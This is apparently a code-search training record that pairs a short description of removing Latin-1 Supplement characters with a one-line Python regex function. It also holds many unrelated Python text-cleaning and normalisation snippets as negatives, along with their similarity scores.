re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def clean(text):\n new = text.replace(\"\\r\", \"\")\n new = new.replace(\"\\t\", \"\")\n new = new.replace(\"\\n\", \"\")\n new = new.replace(\"- \", \"-\")\n new = new.replace(\" \", \" \")\n return new", "def _removeWhitespaces(self, s):\n return s.translate({ord(c): None for c in string.whitespace})", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining 
non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def clean(sent):\n p1 = re.compile('\\W')\n p2 = re.compile('\\s+')\n sent = re.sub(r\"http\\S+\", \"\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n sent = re.sub(r'[A-Za-z0-9]', r'', sent)\n sent = re.sub(p1, ' ', sent)\n sent = re.sub(p2, ' ', sent)\n return sent", "def _hidden_in_unicode(self, txt):", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_chunk(chunk):\n return '\\n'.join([x[1:] for x in chunk.split('\\n')\n if x and x[0] not in ('-', '@')])", "def process(line, form):\n return unicodedata.normalize(form, line)", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def stripUnderline(self, s):\n return s.replace('\\x1f', '').replace('\\x1F', '')", "def _removeDiacritics(self, text):\n norm_txt = unicodedata.normalize('NFD', text)\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n # remove accents and other diacritics, replace spaces with \"_\" because identifiers can't have spaces\n no_spaces = unicodedata.normalize(\n 'NFC', shaved).lower().replace(\" \", \"_\")\n final_text = no_spaces\n # only allow [a-z], [0-9] and _\n p = re.compile('[a-z0-9_]+')\n for i in range(0, len(no_spaces)):\n if not (p.match(no_spaces[i])):\n final_text = final_text[:i] + '_' + final_text[i+1:]\n # i the first char is not a-z then replaceit (all identifiers must start with a letter)\n p2 = re.compile('[a-z]+')\n if not p2.match(final_text[0]):\n final_text = 'a' + final_text[1:]\n return final_text", "def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence", "def clean_text_from_latin_supplement_unicode(text):\n return re.sub(r\"([\\u0080-\\u00FF])\", \" \", text)", "def clean_text_from_latin_supplement_unicode(text):\n return re.sub(r\"([\\u0080-\\u00FF])\", \" \", text)", "def test__clean_line():\n LINES = {\n \"One morn before me were three figures seen,\":\n \"One morn before me were three 
figures seen,\",\n \"And once—more came they by:-alas! wherefore?\":\n \"And once more came they by: alas! wherefore?\",\n }\n for line, clean_line in LINES.items():\n assert(LineBuilder(line)._clean_line() == clean_line)", "def sanitise(text: str):\n # Removes new lines, weird characters and dialogue\n text = \" \" + text + \" \"\n\n lined_text = text.split(\"\\n\")\n text = \"\"\n # Remove dialogue\n for line in lined_text:\n if \":\" in line:\n if line.index(\":\") < 15:\n index = line.index(\":\") + 1\n else:\n index = 0\n else:\n index = 0\n text = text + \"\\n\" + line[index:]\n\n # Lower case everything\n text = text.lower()\n\n text = text.replace(\"'s\", \" is\")\n text = text.replace(\"'ve\", \" have\")\n text = text.replace(\"n't\", \" not\")\n text = text.replace(\"I'm\", \"I am\")\n text = text.replace(\"'re\", \" are\")\n text = text.replace(\"’s\", \" is\")\n text = text.replace(\"’ve\", \" have\")\n text = text.replace(\"n’t\", \" not\")\n text = text.replace(\"I’m\", \"I am\")\n text = text.replace(\"’re\", \" are\")\n\n # Remove weird characters and double spaces\n weird_characters = [\".\", \",\", \"?\", \"!\", \"'\", \"’\", \"\\\"\", \"\\n\", \"\\t\", \"-\", \"/\", \"[\", \"]\", \"(\", \")\", \":\", \"“\", \"”\"]\n for weird_character in weird_characters:\n text = text.replace(weird_character, \" \")\n\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n return text", "def squeeze(value):\r\n return re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def pre_process_line(self, line):\n\n line = line.lower()\n line = line.translate(co.NORM_TABLE)\n line = line.translate(co.PUNC_TABLE)\n line = line.split()\n line = line[self.configs[\"resources\"][self.resource_type][\"lstrip\"]:]\n if self.configs[\"resources\"][self.resource_type][\"rstrip\"]:\n line = line[:-self.configs[\"resources\"][self.resource_type][\"rstrip\"]]\n return \" \".join(line)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def sanitize(buf,\n backspaces=['\\x08\\x1b[K', '\\x08 \\x08'],\n escape_regex=re.compile(r'\\x1b(\\[|\\]|\\(|\\))[;?0-9]*[0-9A-Za-z](.*\\x07)?')):\n # Filter out control characters\n\n # First, handle the backspaces.\n for backspace in backspaces:\n try:\n while True:\n ind = buf.index(backspace)\n buf = ''.join((buf[0:ind-1],buf[ind+len(backspace):]))\n except:\n pass\n\n strip_escapes = escape_regex.sub('',buf)\n\n # strip non-printable ASCII characters\n\n clean = ''.join([x for x in strip_escapes if is_printable(x)])\n return clean", "def clean_header(klass, s):\n return re.sub(r\"[\\n\\r\\t]+\", \" \", s).strip()", "def replace_and_print(line_list):\n line_list = line_list.replace('0', ' ')\n line_list = line_list.replace('1', u\"\\u2588\")\n print(line_list)", "def clean(self, x): # should not contain any other 
arguments (use fields set in constructor instead).\n\n def repl(m):\n return chr(int('0x' + m.group(1), 16))\n\n # replace double escaped \"\\\\\" unicode strings with their unicode characters\n x = [re.sub(r'\\\\n', '\\n', message) for message in x]\n x = [re.sub(r'\\\\x([a-f0-9]{2})', repl, message) for message in x]\n x = [re.sub(r'\\\\u([a-f0-9]{4})', repl, message) for message in x]\n if self.ignore_urls:\n x = [re.sub(self.re_url, '', message) for message in x]\n\n if self.fix_contractions:\n import contractions\n x = [contractions.fix(message) for message in x]\n\n if self.remove_foreign_characters:\n # replace accented characters with unaccented\n x = [unidecode.unidecode(message) for message in x]\n\n # replace nonascii characters with space\n x = [''.join(character if ord(character) < 128 else ' ' for character in message) for message in x]\n\n # Create sentence structure like nltk gutenberg.sents()\n # list of sentences for each message:\n x = [self.sent_detector.tokenize(message.strip()) for message in x]\n # list of list of words for each message/sentence:\n x = [[self.word_tokenizer.tokenize(sentence) for sentence in message] for message in x]\n\n if self.lower:\n # lower_sents: lowercase words ignoring punctuation\n x = [[[\n word.lower() for word in sentence] for sentence in message\n ] for message in x]\n\n if self.remove_punctuation:\n x = [[[\n word for word in sentence if word not in list(string.punctuation)] for sentence in message\n ] for message in x]\n\n if self.stem:\n x = [[[self.stemmer.stem(word) for word in sentence] for sentence in message] for message in x]\n\n if self.lower and self.bigrams:\n # clean_sents: replace common adjacent words with bigrams\n x = [[self.bigram[sentence] for sentence in message] for message in x]\n\n if self.omit_stopwords:\n x = [[[word for word in sentence if word not in stopwords.words('english')] for sentence in message] for\n message in x]\n\n # convert back to one string per message (join words into sentences and sentences into messages)\n x = ['\\n'.join(' '.join(sentence) for sentence in message) for message in x]\n return x", "def _prune_ansi(line):\n\n pattern = re.compile('\\x1b[^m]+m')\n match = pattern.search(line)\n while match:\n index = line.find(match.group(0))\n line = line[:index] + line[index+len(match.group(0)):]\n match = pattern.search(line)\n return line", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def clean_line(self, line):\n\n if \"#\" in line:\n temp = line.split(\"#\")\n if len(temp) < 2:\n return \"\"\n else:\n temp = temp[0] + \"\\n\"\n\n # make sure the \"#\" isn't in quotes\n if temp.count(\"\\\"\") % 2 == 0:\n line = temp\n\n line = line.replace(\"}\", \" } \").replace(\"{\", \" { \")\n while \"=\" in line:\n line = self.replace_equals(line)\n line = line.lstrip()\n return line", "def clear_line(string):\n for character in string:\n #backtrack-whitespace-backtrack\n sys.stdout.write(\"\\b \\b\")", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = 
clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def sanitize(s):\n s = s.replace(\"_\", \"\\\\_\")\n return s", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def Clean(s):\n for c in BAD_CHARACTERS:\n s = s.replace(c, '_')\n return s", "def remove_space(line):\n split_line = line.split()\n return \"\".join(split_line)", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def fix_text(text):\n ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))\n text = text.replace('\\n', '')\n text = text.upper()\n\n return text.strip()", "def clean_line(line: str) -> str:\n tokens = re.sub('[^a-z0-9 ]+', ' ', line.lower()).split(' ')\n stemmed_tokens = [w for w in tokens if len(w) > 2]\n return ' '.join(stemmed_tokens)", "def safe(self, string):\n if sys.version_info.major >= 3 and isinstance(string, bytes):\n string = string.decode('utf8')\n elif sys.version_info.major < 3:\n if not isinstance(string, unicode):\n string = unicode(string, encoding='utf8')\n string = string.replace('\\n', '')\n string = string.replace('\\r', '')\n return string", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def remove_control_chars(json_string):\n return re.sub('[\\x00-\\x1f]', '',json_string)", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def clean_smile(self, smi):\n smi = smi.replace('\\n', '')\n return smi", "def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data", "def filter_blanks(user, str):\n if user.is_staff:\n return str\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def sanitise(s, max_len=MAX_STRING_LENGTH):\n result = ''\n if len(s) > max_len:\n s = s[0: max_len // 2] + \"\\n*** <snip> ***\\n\" + s[-max_len // 2:]\n lines = s.rstrip().splitlines()\n for line in lines:\n for c in line.rstrip() + '\\n':\n if c < ' ' and c != '\\n':\n if c == '\\t':\n c = r'\\t'\n elif c == '\\r':\n c = r'\\r'\n else:\n c = r'\\{:03o}'.format(ord(c))\n result += c\n return result.rstrip()", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def remove_non_ascii(text):\n return re.sub(r'[^\\x00-\\x7F]', ' ', text)", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', 
rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def clean_text_for_skill_extraction(text):\n multi_space_regex = re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has &#8211; value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n #&nbsp;\r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text", "def wipe_bad_chars(filename):\n return multi_replace(filename, {'(': '', ' ': '_', ')': '', '/': '_'})", "def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])", "def sanitize_unicode(value):\n return re.sub(\"[\\x00-\\x08\\x0B\\x0C\\x0E-\\x1F\\uD800-\\uDFFF\\uFFFE\\uFFFF]\", \"\", value)", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text", "def del_whitespace(selfs, text):\n\t\treturn text.replace(' ', '')", "def tidy_string(s: str\n ) -> str:\n s = s.encode('ascii', errors='ignore').decode(FORMAT)\n s = s.replace(\"\\r\", \"\").replace(\"\\t\", \"\").replace('\\n', '') \n return s", "def fix_horizontal(line):\n\tline = line.rstrip()\n\tline = untabify(line, tab_width)\n\treturn line + '\\n'", "def unscorize(s):\n return s.replace(\" \", \"_\")", "def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)", "def remove_linebreaks(self, text):\n return re.sub(ur\"\\n(?!(\"\n u\"DZIAŁ [IVXLC]|\"\n u\"Rozdział [IVXLC1-9]|\"\n u\"Art\\.|\"\n u\"§ \\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\)|\"\n u\"[a-z]+\\)|\"\n u\"–))\", \" \", text)", "def dealCommonline(line):\n\n print \"\\t\\t%s\" % (line.strip('\\n'))", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n string = string.strip(\"\\n\")\n return string", "def remove_nonspacing_marks(string):\n return ''.join(c for c in unicodedata.normalize('NFKD', string) if unicodedata.category(c) !='Mn')", "def strip_space():\n pass", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text" ]
[ "0.6923628", "0.6923628", "0.6871189", "0.68013835", "0.6612186", "0.6590212", "0.643773", "0.6276485", "0.6224105", "0.6136164", "0.60882586", "0.6054826", "0.6043292", "0.60300654", "0.6018717", "0.6001594", "0.5968716", "0.59620196", "0.59620196", "0.5959176", "0.593358", "0.5914048", "0.5872205", "0.5867018", "0.5842751", "0.57787925", "0.57743746", "0.5762607", "0.5756598", "0.57400644", "0.57089514", "0.5707818", "0.56959844", "0.56660724", "0.5664579", "0.56587404", "0.5658496", "0.5638603", "0.5636524", "0.5631201", "0.5621759", "0.56176007", "0.5599863", "0.55944127", "0.5592653", "0.5590339", "0.5554869", "0.5554869", "0.55541056", "0.5550795", "0.5547879", "0.5547769", "0.55441797", "0.5543299", "0.5522171", "0.5510517", "0.54934865", "0.5493036", "0.54806995", "0.5478682", "0.54752594", "0.5474899", "0.5474503", "0.5469532", "0.5456138", "0.54524356", "0.54442614", "0.5442992", "0.5413448", "0.5409676", "0.54087716", "0.5405295", "0.5402027", "0.54011834", "0.5400795", "0.54006964", "0.5397758", "0.53891706", "0.53886837", "0.5385197", "0.5384921", "0.53836644", "0.5382932", "0.5382183", "0.5381626", "0.5381314", "0.5379709", "0.5379305", "0.5378611", "0.53728986", "0.534968", "0.5340396", "0.5337376", "0.5328271", "0.5326454", "0.5325778", "0.5325379", "0.53195727", "0.53173584" ]
0.8404962
1
Clears the text from latin supplement unicodes.
def clean_text_from_latin_supplement_unicode(text): return re.sub(r"([\u0080-\u00FF])", " ", text)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def clear_text(self):\n self.textBrowser.clear()\n #self.ser.flushInput()\n #self.clean_graph()", "def clear_trash(text):\n for i in TRASH:\n text = text.replace(i, '')\n\n return text", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clear_accents(cls) -> None:\n\n cls.__registered_accents = set()", "def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has &#8211; value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n #&nbsp;\r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def clear(self):\n self.sentence.clear()", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def remove_non_ascii(text):\n return re.sub(r'[^\\x00-\\x7F]', ' ', text)", "def clean_unicode(text):\n clean_text = text.encode(\"ascii\", errors=\"replace\").strip().decode(\"ascii\")\n clean_text = clean_text.replace(\"?\", ' ')\n return clean_text", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # 
kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def clear(self):\n\n try:\n label, = self._displayedChar.get_children()\n except ValueError:\n return\n\n label.set_markup(\"\")\n self.dot7.lowerDot()\n self.dot8.lowerDot()", "def clearText(self, element_tuple):\n self.log_info(f\"Browser.clearText: Clearing the text of {element_tuple}\")\n self.CORE.find_element(*self.format_element(element_tuple)).clear()\n return", "def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])", "def remove_punct(self,text):", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_all(entry):\n text = entry.clear_all()", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clear_text(self):\r\n tu.reset()\r\n self.dt_x = self.disp_left\r\n self.dt_y = self.disp_top\r\n tu.penup()\r\n tu.goto(self.dt_x, self.dt_y)\r\n tu.pendown()", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def reset():\r\n simpleText.delete(0.0, 'end')\r\n crypticText.delete(0.0, 'end')\r\n simpleText.insert(INSERT, \"Enter Message Here...\\n\\nDouble-click to edit\\nRight-click to Copy\\nShift + Left-click to Paste\")\r\n crypticText.insert(INSERT, \"Paste Your Cipher Here...\\n\\nDouble-click to edit\\nRight-click to Copy\\nShift + Left-click to Paste\")", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_accented_chars(text):\n text = unidecode.unidecode(text)\n return text", "def remove_accented_chars(text):\n text = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n return text", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def remove_accents(text):\n return ''.join(c for c in unicodedata.normalize('NFKD', text)\n if unicodedata.category(c) != 'Mn')", "def clear_all(self):\n self._set_all(0x00, 0x00, 0x00)", "def _run_strip_accents(self, text):\n text = unicodedata.normalize('NFD', text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == 'Mn':\n continue\n output.append(char)\n return ''.join(output)", "def remove_emoji(txt):\n pattern = (\"[\\U0001F600-\\U0001F64F\"\n + \"\\U0001F300-\\U0001F5FF\"\n + \"\\U0001F680-\\U0001F6FF\"\n + \"\\U0001F1E0-\\U0001F1FF]+\")\n return re.sub(pattern, \"\", txt)", 
"def _run_strip_accents(self, text):\n text = unicodedata.normalize(\"NFD\", text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue\n output.append(char)\n return \"\".join(output)", "def strip_accents(text):\n text = unicodedata.normalize(\"NFD\", text)\n text = text.encode(\"ascii\", \"ignore\")\n text = text.decode(\"utf8\")\n return text", "def clear(self):\n for inp in self.inputlst:\n inp.setText(\"\")", "def _run_strip_accents(self, text):\n text = unicodedata.normalize(\"NFD\", text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue # pragma: no cover\n output.append(char)\n return \"\".join(output)", "def clear_all(cls):\n del cls.text_labels[:]", "def on_clearText(self):\n super(Comment, self).on_clearText()\n self.teText.setHtml(self.stored)\n self.rf_widgetVis()\n self.stored = None", "def clear(self):\n self.knownStrings.clear()", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # 